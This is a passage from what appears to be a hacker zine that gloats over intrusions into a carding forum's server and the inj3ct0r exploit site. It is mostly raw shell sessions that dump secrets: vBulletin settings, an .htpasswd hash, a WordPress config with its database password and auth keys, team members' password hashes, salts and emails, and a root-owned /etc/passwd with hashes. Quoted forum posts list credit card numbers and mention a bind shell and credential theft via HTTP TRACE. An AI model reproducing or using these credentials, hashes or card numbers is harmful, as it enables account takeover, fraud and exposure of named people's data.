  558.         //      log. See the above entry for more information on the format.
  559. $config['SpecialUsers']['canpruneadminlog'] = '4835,9816';
  560.  
  561.         //      ****** USERS WITH QUERY RUNNING PERMISSIONS ******
  562.         //      The users specified here will be allowed to run queries from the control panel.
  563.         //      See the above entries for more information on the format.
  564.         //      Please note that the ability to run queries is quite powerful. You may wish
  565.         //      to remove all user IDs from this list for security reasons.
  566. $config['SpecialUsers']['canrunqueries'] = '4835,9816';
  567.  
  568.         //      ****** UNDELETABLE / UNALTERABLE USERS ******
  569.         //      The users specified here will not be deletable or alterable from the control panel by any users.
  570.         //      To specify more than one user, separate userids with commas.
  571. $config['SpecialUsers']['undeletableusers'] = '';
  572.  
  573.         //      ****** SUPER ADMINISTRATORS ******
  574.         //      The users specified below will have permission to access the administrator permissions
  575.         //      page, which controls the permissions of other administrators
  576. $config['SpecialUsers']['superadministrators'] = '4835,9816';
  577.  
  578.         // ****** DATASTORE CACHE CONFIGURATION *****
  579.         // Here you can configure different methods for caching datastore items.
  580.         // vB_Datastore_Filecache  - to use includes/datastore/datastore_cache.php
  581.         // vB_Datastore_APC - to use APC
  582.         // vB_Datastore_XCache - to use XCache
  583.         // vB_Datastore_Memcached - to use a Memcache server, more configuration below
  584. // $config['Datastore']['class'] = 'vB_Datastore_Filecache';
  585.  
  586.         // ******** DATASTORE PREFIX ******
  587.         // If you are using a PHP Caching system (APC, XCache, eAccelerator) with more
  588.         // than one set of forums installed on your host, you *may* need to use a prefix
  589.         // so that they do not try to use the same variable within the cache.
  590.         // This works in a similar manner to the database table prefix.
  591. // $config['Datastore']['prefix'] = '';
  592.  
  593.         // It is also necessary to specify the hostname or IP address and the port the server is listening on
  594. /*
  595. $config['Datastore']['class'] = 'vB_Datastore_Memcached';
  596. $i = 0;
  597. // First Server
  598. $i++;
  599. $config['Misc']['memcacheserver'][$i]           = '127.0.0.1';
  600. $config['Misc']['memcacheport'][$i]                     = 11211;
  601. $config['Misc']['memcachepersistent'][$i]       = true;
  602. $config['Misc']['memcacheweight'][$i]           = 1;
  603. $config['Misc']['memcachetimeout'][$i]          = 1;
  604. $config['Misc']['memcacheretry_interval'][$i] = 15;
  605. */
  606.  
  607. // ****** The following options are only needed in special cases ******
  608.  
  609.         //      ****** MySQLI OPTIONS *****
  610.         // When using MySQL 4.1+, MySQLi should be used to connect to the database.
  611.         // If you need to set the default connection charset because your database
  612.         // is using a charset other than latin1, you can set the charset here.
  613.         // If you don't set the charset to be the same as your database, you
  614.         // may receive collation errors.  Ignore this setting unless you
  615.         // are sure you need to use it.
  616. $config['Mysqli']['charset'] = 'latin1';
  617.  
  618.         //      Optionally, PHP can be instructed to set connection parameters by reading from the
  619.         //      file named in 'ini_file'. Please use a full path to the file.
  620.         //      Example:
  621.         //      $config['Mysqli']['ini_file'] = 'c:\program files\MySQL\MySQL Server 4.1\my.ini';
  622. $config['Mysqli']['ini_file'] = '/etc/my.cnf';
  623.  
  624. // Image Processing Options
  625.         // Images that exceed either dimension below will not be resized by vBulletin. If you need to resize larger images, alter these settings.
  626. $config['Misc']['maxwidth'] = 2592;
  627. $config['Misc']['maxheight'] = 1944;
  628.  
  629. /*======================================================================*\
  630. || ####################################################################
  631. || #
  632. || # CVS: $RCSfile$ - $Revision: 32878 $
  633. || ####################################################################
  634. \*======================================================================*/
  635.  
  636. $ cd ..
  637.  
  638. $ cd jabber.carders.cc
  639.  
  640. $ ls
  641. total 812
  642. drwxrwxr-x  2 carderscc  www     512 Dec  2 00:34 .
  643. drwxr-x---  7 carderscc  www     512 Nov 18 20:45 ..
  644. -rwxrwxr-x  1 carderscc  www    7948 Apr 28  2008 AC_OETags.js
  645. -rwxrwxr-x  1 carderscc  www  629979 Apr 28  2008 SparkWeb.swf
  646. -rw-r--r--  1 carderscc  www  128693 Dec  2 00:34 c100.txt
  647. -rwxrwxr-x  1 carderscc  www    3638 Apr 28  2008 favicon.ico
  648. -rwxrwxr-x  1 carderscc  www    1272 Apr 28  2008 history.htm
  649. -rwxrwxr-x  1 carderscc  www    1292 Apr 28  2008 history.js
  650. -rwxrwxr-x  1 carderscc  www    2656 Apr 28  2008 history.swf
  651. -rwxrwxr-x  1 carderscc  www   14590 Jun 30 16:00 index.html
  652. -rwxrwxr-x  1 carderscc  www    2518 Apr 28  2008 osxmousewheel.js
  653. -rwxrwxr-x  1 carderscc  www     657 Apr 28  2008 playerProductInstall.swf
  654.  
  655. $ cd pma
  656.  
  657. $ cat .htpasswd
  658. admin:0VisONWLe5DJE
  659.  
  660. $ cd /
  661.  
  662. $ls
  663. total 47
  664. drwxr-xr-x  17 root  wheel   512 Jul  3 19:12 .
  665. drwxr-xr-x  17 root  wheel   512 Jul  3 19:12 ..
  666. -rw-r--r--   1 root  wheel   798 Jan 18  2010 .cshrc
  667. -rw-r--r--   1 root  wheel   265 Jan 18  2010 .profile
  668. -r--r--r--   1 root  wheel  6206 Jan 18  2010 COPYRIGHT
  669. -rw-r--r--   1 root  wheel     0 Jul  3 19:12 a
  670. drwxr-xr-x   2 root  wheel  1024 Jan 18  2010 bin
  671. drwxr-xr-x   7 root  wheel   512 Jan 18  2010 boot
  672. dr-xr-xr-x   5 root  wheel   512 Nov 24 21:14 dev
  673. drwxr-xr-x  22 root  wheel  2560 Nov  1 23:54 etc
  674. drwxr-x--x   4 root  wheel   512 Nov  1 23:54 home
  675. drwxr-xr-x   3 root  wheel  1536 Jan 18  2010 lib
  676. drwxr-xr-x   2 root  wheel   512 Apr  4  2010 libexec
  677. drwxr-xr-x   2 root  wheel   512 Jan 18  2010 media
  678. drwxr-xr-x   2 root  wheel   512 Jan 18  2010 mnt
  679. dr-xr-xr-x   1 root  wheel     0 Dec  6 00:58 proc
  680. drwxr-xr-x  11 root  wheel  1024 Nov  8 20:33 root
  681. drwxr-xr-x   2 root  wheel  2560 Jan 18  2010 sbin
  682. lrwxr-xr-x   1 root  wheel    11 Jan 18  2010 sys -> usr/src/sys
  683. drwxrwxrwt  11 root  wheel   512 Dec  5 23:42 tmp
  684. drwxr-xr-x 15 root  wheel   512 Jan 18  2010 usr
  685. drwxr-xr-x  23 root  wheel   512 Nov 24 21:14 var
  686.  
  687. ?>
  688.  
  689. $ cd /home/cardersblog
  690.  
  691. $ ls
  692. total 8
  693. drwxr-xr-x  4 cardersblog  www     512 Nov  2 01:16 .
  694. drwxr-x--x  4 root         wheel   512 Nov  1 23:54 ..
  695. dr-xr-x---  5 cardersblog  www    1024 Nov 21 00:18 blog.carders.cc
  696. drwxrwxrwx  2 cardersblog  www     512 Nov  2 01:16 temp
  697.  
  698. $ cd blog.carders.cc
  699.  
  700. $ ls
  701. total 2928
  702. dr-xr-x---  5 cardersblog  www     1024 Nov 21 00:18 .
  703. drwxr-xr-x  4 cardersblog  www      512 Nov  2 01:16 ..
  704. -rw-r--r--  1 cardersblog  www      188 Nov 21 00:18 .htaccess
  705. -r-xr-x---  1 cardersblog  www      397 Aug 27 17:22 index.php
  706. -r-xr-x---  1 cardersblog  www  2683109 Jul 18 16:06 latest.tar.gz
  707. -r-xr-x---  1 cardersblog  www    15410 Aug 27 17:22 license.txt
  708. -r-xr-x---  1 cardersblog  www     9122 Aug 27 17:22 readme.html
  709. -r-xr-x---  1 cardersblog  www     4391 Aug 27 17:22 wp-activate.php
  710. dr-xr-x---  7 cardersblog  www     2560 Jul 18 16:06 wp-admin
  711. -r-xr-x---  1 cardersblog  www    40284 Aug 27 17:23 wp-app.php
  712. -r-xr-x---  1 cardersblog  www      220 Aug 27 17:23 wp-atom.php
  713. -r-xr-x---  1 cardersblog  www      274 Aug 27 17:23 wp-blog-header.php
  714. -r-xr-x---  1 cardersblog  www     3926 Aug 27 17:23 wp-comments-post.php
  715. -r-xr-x---  1 cardersblog  www      238 Aug 27 17:23 wp-commentsrss2.php
  716. -r-xr-x---  1 cardersblog  www     3173 Aug 27 17:23 wp-config-sample.php
  717. -r-xr-x---  1 cardersblog  www     3506 Jul 31 14:20 wp-config.php
  718. dr-xr-x---  6 cardersblog  www      512 Aug 27 18:05 wp-content
  719. -r-xr-x---  1 cardersblog  www     1255 Aug 27 17:23 wp-cron.php
  720. -r-xr-x---  1 cardersblog  www      240 Aug 27 17:23 wp-feed.php
  721. dr-xr-x---  7 cardersblog  www     2560 Jul 18 16:06 wp-includes
  722. -r-xr-x---  1 cardersblog  www     2002 Aug 27 17:23 wp-links-opml.php
  723. -r-xr-x---  1 cardersblog  www     2441 Aug 27 17:23 wp-load.php
  724. -r-xr-x---  1 cardersblog  www    26059 Aug 27 17:23 wp-login.php
  725. -r-xr-x---  1 cardersblog  www     7774 Aug 27 17:23 wp-mail.php
  726. -r-xr-x---  1 cardersblog  www      487 Aug 27 17:23 wp-pass.php
  727. -r-xr-x---  1 cardersblog  www      218 Aug 27 17:23 wp-rdf.php
  728. -r-xr-x---  1 cardersblog  www      316 Aug 27 17:23 wp-register.php
  729. -r-xr-x---  1 cardersblog  www      218 Aug 27 17:23 wp-rss.php
  730. -r-xr-x---  1 cardersblog  www      220 Aug 27 17:23 wp-rss2.php
  731. -r-xr-x---  1 cardersblog  www     9177 Aug 27 17:23 wp-settings.php
  732. -r-xr-x---  1 cardersblog  www    18695 Aug 27 17:23 wp-signup.php
  733. -r-xr-x---  1 cardersblog  www     3702 Aug 27 17:23 wp-trackback.php
  734. -r-xr-x---  1 cardersblog  www    94184 Aug 27 17:23 xmlrpc.php
  735.  
  736. $ cat wp-config.php
  737. <?php
  738. /**
  739.  * The base configurations of the WordPress.
  740.  *
  741.  * This file has the following configurations: MySQL settings, Table Prefix,
  742.  * Secret Keys, WordPress Language, and ABSPATH. You can find more information
  743.  * by visiting {@link http://codex.wordpress.org/Editing_wp-config.php Editing
  744.  * wp-config.php} Codex page. You can get the MySQL settings from your web host.
  745.  *
  746.  * This file is used by the wp-config.php creation script during the
  747.  * installation. You don't have to use the web site, you can just copy this file
  748.  * to "wp-config.php" and fill in the values.
  749.  *
  750.  * @package WordPress
  751.  */
  752.  
  753. // ** MySQL settings - You can get this info from your web host ** //
  754. /** The name of the database for WordPress */
  755. define('DB_NAME', 'carderscc_02');
  756.  
  757. /** MySQL database username */
  758. define('DB_USER', 'carderscc_02');
  759.  
  760. /** MySQL database password */
  761. define('DB_PASSWORD', 'UGZf7e6gzugef76t&/gudz376/&$%e3zugdwzgdwdztFzettf6532df');
  762.  
  763. /** MySQL hostname */
  764. define('DB_HOST', 'localhost');
  765.  
  766. /** Database Charset to use in creating database tables. */
  767. define('DB_CHARSET', 'utf8');
  768.  
  769. /** The Database Collate type. Don't change this if in doubt. */
  770. define('DB_COLLATE', '');
  771.  
  772. /**#@+
  773.  * Authentication Unique Keys and Salts.
  774.  *
  775.  * Change these to different unique phrases!
  776.  * You can generate these using the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}
  777.  * You can change these at any point in time to invalidate all existing cookies. This will force all users to have to log in again.
  778.  *
  779.  * @since 2.6.0
  780.  */
  781. define('AUTH_KEY',         'Mcpgq1/{n^mP,4naDg;4Y/gdX+J~.(DBLI|y~FJy*+@BDtD=CJr^M$idR[*P vuR');
  782. define('SECURE_AUTH_KEY',  '-=q0$7`R?iH}MkK^KHxbxa4)-]OcrG3y2^EVT^fs%6&7-!<v.<__AcgC^_T+$$sM');
  783. define('LOGGED_IN_KEY',    'Sb{c7+Nhb%ao-#ylff|(I{m,fqK5}>/?7m8/r0!,o}+e:eQfZo;7W:h7av[E:0V[');
  784. define('NONCE_KEY',        '|R(!,}:(`utsK5k<SJ%:J#b&UR/LxE.50Y9`6:zP;Kj0VVeGWx4(%Guh=+gb^{W6');
  785. define('AUTH_SALT',        '|zI ^JtuY-|uB;}I~X~Sn.W[BZ_pX gWA*nFL`SR]b+ bB,LVj7u+Rov|F=*@ DP');
  786. define('SECURE_AUTH_SALT', 'N^]btUNZY-k+|%HkM##`iB2b{pftxG~:WDLwp}a!M+d8Gy.*M?p(]-SQPfZq]+k)');
  787. define('LOGGED_IN_SALT',   'JASsyk1%PQ|!exxL,JB|0or-~zWcx+lv+KpnMH<M<&+Ro=USk--Z:8 #8a!+NkL$');
  788. define('NONCE_SALT',       'yN8`y~ji$4+1)&N3j+KcY*x~n7=vS)Ip;! [>Q0$LoSd=e?X+C]bqBEp5WWbWLSb');
  789.  
  790. /**#@-*/
  791.  
  792. /**
  793.  * WordPress Database Table prefix.
  794.  *
  795.  * You can have multiple installations in one database if you give each a unique
  796.  * prefix. Only numbers, letters, and underscores please!
  797.  */
  798. $table_prefix  = 'wp_';
  799.  
  800. /**
  801.  * WordPress Localized Language, defaults to English.
  802.  *
  803.  * Change this to localize WordPress.  A corresponding MO file for the chosen
  804.  * language must be installed to wp-content/languages. For example, install
  805.  * de.mo to wp-content/languages and set WPLANG to 'de' to enable German
  806.  * language support.
  807.  */
  808. define ('WPLANG', '');
  809.  
  810. /**
  811.  * For developers: WordPress debugging mode.
  812.  *
  813.  * Change this to true to enable the display of notices during development.
  814.  * It is strongly recommended that plugin and theme developers use WP_DEBUG
  815.  * in their development environments.
  816.  */
  817. define('WP_DEBUG', false);
  818.  
  819. /* That's all, stop editing! Happy blogging. */
  820.  
  821. /** Absolute path to the WordPress directory. */
  822. if ( !defined('ABSPATH') )
  823.  define('ABSPATH', dirname(__FILE__) . '/');
  824.  
  825. /** Sets up WordPress vars and included files. */
  826. require_once(ABSPATH . 'wp-settings.php');
  827.  
  828. ##
  829.  
  830.  
  831.                                                                |  
  832.                                                   __________   |  
  833.                                  _    __    _    |          |  |  
  834.                                 /_\  /  \  /_\   |          |  |  
  835.          put  shit              =|= | // | =|=   |          |  |  
  836.           to shit                !   \__/   !    |          |  |  
  837.         carders.cc                     _         |          |  |  
  838.        ___   |           ___          //'        |          |  |  
  839.       [___]  |    _   :=|   |=:   __T_||_T__     |p=        |  |  
  840.       |  ~|  |  =)_)=   |   |    [__________]    |          |  |  
  841.       |   |  |   (_(    |xXx|     \_      _/     |          |  |  
  842.       |   |  |   )_)    """""       \    /       |          |  |  
  843.       \___|  V                       |  |        |          |  |  
  844.        |  `========,                 |  |        |          |  |  
  845. ________`.        .'_________________|  |________|__________lc_|  
  846.           `.    .'                  (____)                      \
  847.           _|    |_...             .;;;;;;;;.                     \
  848.          (________);;;;          :;;;;;;;;;;:                    
  849.               :::::::'            '::::::::'  HAPPY NINJA BATHROOM
  850.  
  851. Team Member Passes:
  852.  
  853. Vitali:28cf8ccb53f80f7e8fca5e781f2e6424:dusFzU/ZvUe;e@fx\\3>XIgN[yGx9[*:admin@carders.cc
  854. Juri:9475264713e83164de106d099350ff97:pqfgN4x7P)5_}0-E+PsIJ\\=_o1|oV&:daafagafd@dadadagfasg.dsxc
  855. Luigi:13ae8bfbd4fc44302fc6261f58dd583e:.u5//.-K4<b~M[3Ag#|xSIHhmSuKrT:bla@bla.de
  856. acheron:60536586e174bce7aa1fccf6a674f6f6:"Ru97*G!'*1'{vhs}3Ze4jCnQ8CT=p:
  857. cyberhood:c5ad50f86c6dbbbea072c243b6466a1f:XY4NYQYr:soh.cyberhood@googlemail.com
  858. e0s:86ca341341366d95e5eb02c79d1cfd47:Q\\8NL6Zno+G-}J'n(T?ndQbV{vhcN=:e0s@z1p.biz
  859. M0RPHEUS:fa667b7f92f7cc9f7739bbbbe68f9a9c:E\\T$#=?"hy"g0BD~@giHAtDDj`P0VS:m0rpheus@carders.cc
  860. Mr.Rus:6e3c81779f105c2cb8a5f36261000cc5:x6GX91GTd$D^yn/@U>`u$lm00M3V}h:d397080@lhsdv.com
  861. Poseidon:0c18d81bcfa2845490f75e785f0e2457:BG$vA-%K_X<F8S%-"~fzr8&t(JJV)7:b2926398@lhsdv.com
  862. SILEN0S:a02675626c179834bf1a2545658a9426:5{+!Og}.xKA&$PHo)5nH-DKO_[zK9L:silen0s@ymail.com
  863. slashx:edb36a0c2d7fe71ecabe36152b4ff942:S'I)uhPovr~Y=;/$S=p)k.SFdqw7)P:jobby.cyriac@web.de
  864. Tiberius:03b38fcabea847925ab42d66e8134d1b:GS.XKvwJnhsr[7a9l7E6g+?E><=|nF:tiberiusus@carders.in
  865.  
  866.  
  867. You guys dont get it, do you? We told you to fuck off  and  still  you
  868. did not listen. We are not sorry for doing it again. You deserve it.  
  869.  
  870.  ____________________________________________________|_._._._._._._._,
  871.  \___________________________________________________|_|_|_|_|_|_|_|_|
  872.                                                      !  ~ inj3ct0r ~  
  873.  
  874. #`````````` ___    ____    ____
  875. #````______/```\__//```\__/____\
  876. #``_/```\_/``:```````````//____\
  877. #`/|``````:``:``..``````/````````\   W A R N I N G !!! DISCOVERED LAMER O_o
  878. #|`|`````::`````::``````\````````/
  879. #|`|`````:|`````||`````\`\______/
  880. #|`|`````||`````||``````|\``/``|
  881. #`\|`````||`````||``````|```/`|`\    1) maybe you were wrong address, go Inj3ct0r.com
  882. #``|`````||`````||``````|``/`/_\`\
  883. #``|`___`||`___`||``````|`/``/````\
  884. #```\_-_/``\_-_/`|`____`|/__/``````\
  885. #````````````````_\_--_/````\`````/  2) Or you are not wrong address, then Fuck Off!
  886. #```````````````/____```````````/
  887. #``````````````/`````\`````````/
  888. #``````````````\______\_______/
  889.  
  890. Attention. This ridiculous banner is *not* part of our zine.  In  fact
  891. it is inj3ct0r's 404 page. We concluded  that  this  banner  perfectly
  892. reflects their retardedness. Their knowledge about security is on  the
  893. same level as their ability to speak proper  english.  For  those  who
  894. don't  know:  inj3ct0r  is  a  clone  of  the  old  milw0rm   project,
  895. administered by some morons called "r0073r", "Sid3^effects" and  "L0rd
  896. CrusAd3r". They are not only  an  exploit-db,  but  also  an  arrogant
  897. community of retarded turks and arabs which tell you how you to  write
  898. your stupid Perl SQL-Injection exploit.                              
  899.                                                                      
  900. All their attention whoring about how they hacked Facebook was driving
  901. us insane and all their moaning about how they have problems with  the
  902. law was just too ridiculous for us  to  let  them  continue  existing.
  903. Actually we did not find out what kind of law problems  they  actually
  904. had. We did however discover how stupid these kids are and  what  crap
  905. they are talking about in their private forum area's. Check it out:  
  906.  
  907. -------------
  908. -0day 31337 privat Area
  909. -10-24-2010, 05:08 PM Post by KnocKout:
  910. -
  911. -0-Day Credit Cards | Part 2(Only 31337 Prv.)-
  912. -
  913. -Hi My Brothers..
  914. -
  915. -14367 4454-5454-5454-5445 1 232 12-2012
  916. -14375 5257-9555-0001-0933 1 082 03-2013 ADVANTAGE
  917. -14376 5492-9495-5876-7382 1 280 01-2013 BONUS
  918. -14391 5437-7122-6415-1343 1 334 07-2012 MAX?MUM
  919. -14392 5437-7122-6415-1343 1 334 07-2012 MAX?MUM
  920. --------------
  921. -
  922. -0day 31337 privat Area
  923. -10-17-2010, 04:36 PM Post by KnocKout:
  924. -
  925. -Default  => Rapid,Hotfile,CC Requests..  
  926. -
  927. -hi my brothers,
  928. -RapidShare, Hotfile Premium and Credit Card. Requests..
  929. -
  930. -Please indicate your requests here, and I will send Pm..
  931. --------------
  932.  
  933. Not only they are sharing CC's, they also think of themselves  as  the
  934. best hackerz on the planet. Here is how they talk about exploit-db and
  935. offsec:                                                              
  936.  
  937. -------------
  938. -0day 31337 privat Area:
  939. -07-19-2010, 10:05 PM Post by SeeMe:
  940. -
  941. -guys, a bind shell have been sent to offsec server and enforced the regarding ports to be open
  942. -
  943. -Port State Service Reason Product Version Extra info
  944. -22 tcp open ssh syn-ack OpenSSH 5.4 protocol 2.0
  945. -80 tcp open http syn-ack Apache httpd 2.2.15 (Fedora)
  946. -301 tcp filtered unknown no-response
  947. -443 tcp open https syn-ack
  948. -1072 tcp filtered unknown no-response
  949. -1087 tcp filtered unknown no-response
  950. -1100 tcp filtered unknown no-response
  951. -1111 tcp filtered unknown no-response
  952. -1117 tcp filtered unknown no-response
  953. -1443 tcp filtered ies-lm no-response
  954. -1718 tcp filtered unknown no-response
  955. -1720 tcp filtered H.323/Q.931 no-response
  956. -1900 tcp filtered upnp no-response
  957. -2000 tcp filtered cisco-sccp no-response
  958. -2041 tcp filtered interbase no-response
  959. -2046 tcp filtered sdfunc no-response
  960. -2382 tcp filtered ms-olap3 no-response
  961. -3017 tcp filtered unknown no-response
  962. -4129 tcp filtered unknown no-response
  963. -4900 tcp filtered unknown no-response
  964. -5060 tcp filtered sip admin-prohibited
  965. -5555 tcp filtered freeciv no-response
  966. -5560 tcp filtered isqlplus no-response
  967. -6669 tcp filtered irc no-response
  968. -8007 tcp filtered ajp12 no-response
  969. -9102 tcp filtered jetdirect no-response
  970. -10000 tcp open snet-sensor-mgmt syn-ack
  971. -44443 tcp filtered coldfusion-auth no-response
  972. -
  973. -but I just can't connect back to it
  974. -
  975. -any idea!
  976. -------------
  977. -
  978. -07-21-2010, 10:10 PM Post by SeeMe:
  979. -
  980. -This is a new technology for me how to gain credentials over HTTP TRACE and TRACK
  981. -when it's enable on a webserver
  982. -
  983. -The TRACE/TRACK method was enabled on the server listed below:
  984. -
  985. -http://www.offensive-security.com:80/
  986. -
  987. -[PHP]http://www.offensive-security.com/wp-content/themes/infocus/lib/scripts/prettyPhoto/js/jquery.prettyPhoto.js?ver=./2.9.2%20HTTP/1.1[/PHP]
  988. -
  989. -
  990. -could gain view info from the link above  
  991. -------------
  992. -
  993. -07-30-2010, 12:26 AM Post by SeeMe:
  994. -
  995. -http://mobile.backtrack-linux.org/
  996. -
  997. -exploited for good and not sure that will be able to back it up
  998. -
  999. -and I'm still heading for the main both sites, offsec.com and exploit-db
  1000. -
  1001. -After one month into the desert I'll be back infront of my computer on 15th of Agu
  1002. -
  1003. -and I'll prepare for a globel war
  1004. -------------
  1005.  
  1006.  
  1007. They are calling exploit-db "lamers-db" yet they  don't  see  who  the
  1008. real lamers are. Hardly surprising that  the  inj3ct0r  team  did  not
  1009. manage their box themselves and instead gave their work  to  some  fat
  1010. guy called "asker". But since he left  his  box  rot  with  some  half
  1011. updated shit, it was a child's play to tap in and root.              
  1012.  
  1013. $ uname -a
  1014. Linux wateam 2.6.26-2-686 #1 SMP Thu Sep 16 19:35:51 UTC 2010 i686 GNU/Linux
  1015.  
  1016. $ id
  1017. uid=0(root) gid=0(root) groups=0(root)
  1018.  
  1019. $ cd /
  1020.  
  1021. $ ls -la
  1022. total 540
  1023. drwxr-xr-x  22 root root   1024 Oct  3 22:04 .
  1024. drwxr-xr-x  22 root root   1024 Oct  3 22:04 ..
  1025. drwxr-xr-x   2 root root   3072 Oct  3 21:09 bin
  1026. drwxr-xr-x   4 root root   1024 Oct  3 21:10 boot
  1027. drwxr-xr-x  15 root root   3460 Oct 15 15:19 dev
  1028. drwxr-xr-x  68 root root   6144 Oct 20 17:44 etc
  1029. drwxr-x--x  37 root root   4096 Oct 20 17:45 home
  1030. drwxr-xr-x   2 root root   1024 Nov  3  2007 initrd
  1031. lrwxrwxrwx   1 root root     28 Jul 29 11:28 initrd.img -> boot/initrd.img-2.6.26-2-686
  1032. lrwxrwxrwx   1 root root     28 Nov 24  2008 initrd.img.old -> boot/initrd.img-2.6.18-6-686
  1033. drwxr-xr-x  12 root root   7168 Oct  3 21:09 lib
  1034. drwx------   2 root root  12288 Nov  3  2007 lost+found
  1035. drwxr-xr-x   2 root root   1024 Nov  3  2007 media
  1036. drwxr-xr-x   2 root root   1024 Oct 28  2006 mnt
  1037. drwxr-xr-x   2 root root   1024 Nov  3  2007 opt
  1038. dr-xr-xr-x 154 root root      0 Oct 15 15:18 proc
  1039. drwxr-x---   7 root root   1024 Oct 15 17:27 root
  1040. drwxr-xr-x   2 root root   6144 Oct  3 21:09 sbin
  1041. drwxr-xr-x   2 root root   1024 Sep 16  2008 selinux
  1042. drwxr-xr-x   2 root root   1024 Nov  3  2007 srv
  1043. drwxr-xr-x  11 root root      0 Oct 15 15:18 sys
  1044. drwxrwxrwt   7 root root 492544 Oct 24 19:03 tmp
  1045. drwxr-xr-x  12 root root   4096 Jul 29 11:22 usr
  1046. drwxr-xr-x  15 root root   4096 Oct 29  2009 var
  1047. lrwxrwxrwx   1 root root     25 Jul 29 11:28 vmlinuz -> boot/vmlinuz-2.6.26-2-686
  1048. lrwxrwxrwx   1 root root     25 Nov 24  2008 vmlinuz.old -> boot/vmlinuz-2.6.18-6-686
  1049.  
  1050. $ cat /etc/passwd
  1051. root:1NMGwkEq76.BsjeYGuM106fIjuU.RS/:0:0:root:/root:/bin/bash
  1052. daemon:*:1:1:daemon:/usr/sbin:/bin/sh
  1053. bin:*:2:2:bin:/bin:/bin/sh
  1054. sys:*:3:3:sys:/dev:/bin/sh
  1055. sync:*:4:65534:sync:/bin:/bin/sync
  1056. games:*:5:60:games:/usr/games:/bin/sh
  1057. man:*:6:12:man:/var/cache/man:/bin/sh
  1058. lp:*:7:7:lp:/var/spool/lpd:/bin/sh
  1059. mail:*:8:8:mail:/var/mail:/bin/sh
  1060. news:*:9:9:news:/var/spool/news:/bin/sh
  1061. uucp:*:10:10:uucp:/var/spool/uucp:/bin/sh
  1062. proxy:*:13:13:proxy:/bin:/bin/sh
  1063. www-data:*:33:33:www-data:/var/www:/bin/sh
  1064. backup:*:34:34:backup:/var/backups:/bin/sh
  1065. list:*:38:38:Mailing List Manager:/var/list:/bin/sh
  1066. irc:*:39:39:ircd:/var/run/ircd:/bin/sh
  1067. gnats:*:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
  1068. nobody:*:65534:65534:nobody:/nonexistent:/bin/sh
  1069. mysql:!:100:102:MySQL Server,,,:/var/lib/mysql:/bin/false
  1070. proftpd:!:101:65534::/var/run/proftpd:/bin/false
  1071. ftp:!:102:65534::/home/ftp:/bin/false
  1072. sshd:!:103:65534::/var/run/sshd:/usr/sbin/nologin
  1073. Debian-exim:!:104:104::/var/spool/exim4:/bin/false
  1074. krivopustov:1V5RSW94dbZ3zwhsovKB4V5hHgvLLF/:1002:1002:,,,:/home/krivopustov:/bin/bash
  1075. volosovets:1NMLjMXqhFedJgnjw0uBwdQ2jRFqbG0:1007:1007:,,,:/home/volosovets:/bin/bash
  1076. wapper:1c1iEEB/k591mvgQk8a5mbsZmPwY8Q1:1008:1008:,,,:/home/wapper:/bin/bash
  1077. jaguar:1NOCfawFB/TD6X9.hEmN9Mn0kg1G.s1:1011:1011:,,,:/home/jaguar:/bin/bash
  1078. postfix:!:105:106::/var/spool/postfix:/bin/false
  1079. popa3d:!:106:109::/var/lib/popa3d:/bin/false
  1080. asmer:1O2E8f0enwpuZw37FkNoe0MNSktFTd.:1012:1012:,,,:/home/asmer:/bin/bash
  1081. wateam:1cewmdLFokkbiLeLlHrL2NJnPdqpnR/:1013:1013:,,,:/home/wateam:/bin/bash
  1082. silentwarrior:1aDOI9IqA5BrDw1EBfH4Afm5TYRNe//:1014:1014:,,,:/home/silentwarrior:/bin/bash
  1083. snt-nmu:1NZO0tdC.reQ07bby/FttmOEZLF7ys1:1015:1015:,,,:/home/snt-nmu:/bin/bash
  1084. nmusic:1tXoV.I8o28zdaeu.Ukrde4hYikNtG0:1020:1020:,,,:/home/nmusic:/bin/bash
  1085. mydns:1C8cYgZB0p9rtxWwyXoiJiK4QUa.sJ/:1021:1021:,,,:/home/mydns:/bin/bash
  1086. conference-sidelnikov:1ghcMsPcI9j5ok3AbEf5qGI.h7Mq7O.:1016:1016:,,,:/home/conference-sidelnikov:/bin/bash
  1087. lena:153QNshcJB/5PK1r8L/60LAOJCwzik1:1000:1000:,,,:/home/lena:/bin/bash
  1088. vakulenko:1g6y9T9/TWWr1s.FTZKwuKj2qwbYxg1:1027:1027:,,,:/home/vakulenko:/bin/bash
  1089. xanavi:1V4L5wKgWog9Kl4lV0uwvG0/0TyHyq1:1001:1001:,,,:/home/xanavi:/bin/bash
  1090. lalizas:1dzDm0j2v0fE06VyK89b/Pfm6ePylC0:1003:1003:,,,:/home/lalizas:/bin/bash
  1091. r0otech0inj3ct0rr00t0ro0t3r:1Yu.4UMOxpFH639CL8260qyjYwKgbk1:1006:1034:,,,:/home/r0otech0inj3ct0rr00t0ro0t3r:/bin/bash
  1092. n3tw0rkTeRr0r15M:1u1DDFCJnGFd0M07E5kahW3t0N1yYD1:1010:1034:,,,:/home/n3tw0rkTeRr0r15M:/bin/bash
  1093. pma:1cDULb4Zqt4ksmqqFe9MIQSBLrz3lO.:1019:1019:,,,:/home/pma:/bin/bash
  1094. valiant:1QXeOzsOyaW8gT6JknX1Ssa.A3ef8g/:1024:1024:,,,:/home/valiant:/bin/bash
  1095. cherrybikes:11MJaagK8rJ6BQ9pxLdZjU.WhIGG4r0:1031:1031:,,,:/home/cherrybikes:/bin/bash
  1096. natasha:1NmwIlomO.Y00wBbg0eGE9dqOP4qis/:1032:1032:,,,:/home/natasha:/bin/bash
  1097. ntp:!:107:107::/home/ntp:/bin/false
  1098. chupik:1gpJL5HGbm7EeCor46OOs8L0y1L7mH1:1005:1033:,,,:/home/chupik:/bin/bash
  1099. sweethome:1x4j1/bzV8Vf5fHBfeSp3BgMUNojJf.:1004:1035:,,,:/home/sweethome:/bin/bash
  1100. sweethome-lena:1uZFdDmVbAHGDtbBEGs1jjYYtvVONN1:1009:1036:,,,:/home/sweethome-lena:/bin/bash
  1101. skyweb:1.wiXZLSKG4F6WGVdgKDIorjx77.ZD1:1028:1037:,,,:/home/skyweb:/bin/bash
  1102. yslivka:1RNlOuljj5wZ8hdD0kSDe2wPMREdBu1:1029:1038:,,,:/home/yslivka:/bin/bash
  1103. tmv-nmu:168k122DrZFKqjXrwYSjjdMSKzzVDy.:1030:1039:,,,:/home/tmv-nmu:/bin/bash
  1104. web-ghost:1wuuXL1mSrDxVErzeO0KuoZKu8mJBj1:1018:1018:,,,:/home/web-ghost:/bin/bash
